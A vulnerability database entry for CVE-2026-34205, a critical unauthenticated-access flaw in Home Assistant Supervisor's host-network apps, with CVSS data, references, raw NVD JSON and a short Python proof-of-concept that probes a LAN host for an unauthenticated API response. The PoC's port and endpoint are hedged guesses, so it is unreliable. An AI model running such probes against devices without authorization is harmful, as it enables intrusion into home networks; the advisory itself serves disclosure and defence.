CVE-2026-34205

Description

Home Assistant is open source home automation software that puts local control and privacy first. Home Assistant apps (formerly add-ons) configured with host network mode expose unauthenticated endpoints bound to the internal Docker bridge interface to the local network. On Linux, this configuration does not restrict access to the app as intended, allowing any device on the same network to reach these endpoints without authentication. Home Assistant Supervisor 2026.03.02 addresses the issue.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Home Assistant Supervisor < 2026.03.02

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-34205
# Target: Home Assistant Supervisor < 2026.03.02
# Description: Check if unauthenticated endpoints are exposed on LAN

target_host = "192.168.1.XXX" # Replace with target IP
exposed_port = "4357" # Default Supervisor API port might be exposed or Add-on ports

# Attempt to access a sensitive endpoint without auth
url = f"http://{target_host}:{exposed_port}/api/supervisor/info"

try:
    response = requests.get(url, timeout=5)
    if response.status_code == 200:
        print(f"[+] Vulnerability Confirmed: Unauthenticated access allowed.")
        print(f"[+] Response Body: {response.text}")
    else:
        print(f"[-] Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34205
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34205
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34205/
[4] VulDB https://vuldb.com/cve/CVE-2026-34205
[5] https://github.com/home-assistant/core/security/advisories/GHSA-gh5m-4m97-c95h

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34205", "sourceIdentifier": "[email protected]", "published": "2026-03-27T20:16:35.360", "lastModified": "2026-03-30T13:26:29.793", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Home Assistant is open source home automation software that puts local control and privacy first. Home Assistant apps (formerly add-ons) configured with host network mode expose unauthenticated endpoints bound to the internal Docker bridge interface to the local network. On Linux, this configuration does not restrict access to the app as intended, allowing any device on the same network to reach these endpoints without authentication. Home Assistant Supervisor 2026.03.02 addresses the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-923"}]}], "references": [{"url": "https://github.com/home-assistant/core/security/advisories/GHSA-gh5m-4m97-c95h", "source": "[email protected]"}]}}